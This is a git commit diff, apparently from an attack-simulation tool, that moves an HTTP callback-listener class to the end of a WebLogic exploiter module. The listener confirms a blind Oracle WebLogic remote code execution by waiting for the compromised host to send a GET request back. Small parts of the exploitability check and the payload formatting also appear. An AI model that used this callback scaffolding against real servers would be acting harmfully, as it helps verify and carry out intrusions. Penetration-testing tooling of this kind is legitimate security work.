Custom http server class moved to the end of file

This commit is contained in:
Vakaris 2018-08-29 16:55:03 +03:00
parent 57e795573e
commit 3f809403d1
1 changed files with 34 additions and 34 deletions

View File

@ -66,40 +66,6 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
class IndicationHTTPServer(threading.Thread):
"""
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
"""
def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip
self._local_port = local_port
self.get_requests = 0
self.max_requests = max_requests
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
self.daemon = True
def run(self):
class S(BaseHTTPRequestHandler):
@staticmethod
def do_GET():
LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1
LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S)
httpd.daemon = True
self.lock.release()
while not self._stopped and self.get_requests < self.max_requests:
httpd.handle_request()
self._stopped = True
return httpd
def stop(self):
self._stopped = True
def check_if_exploitable(self, url): def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server() httpd, lock = self._start_http_server()
@ -195,3 +161,37 @@ class WebLogicExploiter(WebRCE):
''' '''
payload = generic_check_payload.format(host=ip, port=port) payload = generic_check_payload.format(host=ip, port=port)
return payload return payload
class IndicationHTTPServer(threading.Thread):
"""
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
"""
def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip
self._local_port = local_port
self.get_requests = 0
self.max_requests = max_requests
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
self.daemon = True
def run(self):
class S(BaseHTTPRequestHandler):
@staticmethod
def do_GET():
LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1
LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S)
httpd.daemon = True
self.lock.release()
while not self._stopped and self.get_requests < self.max_requests:
httpd.handle_request()
self._stopped = True
return httpd
def stop(self):
self._stopped = True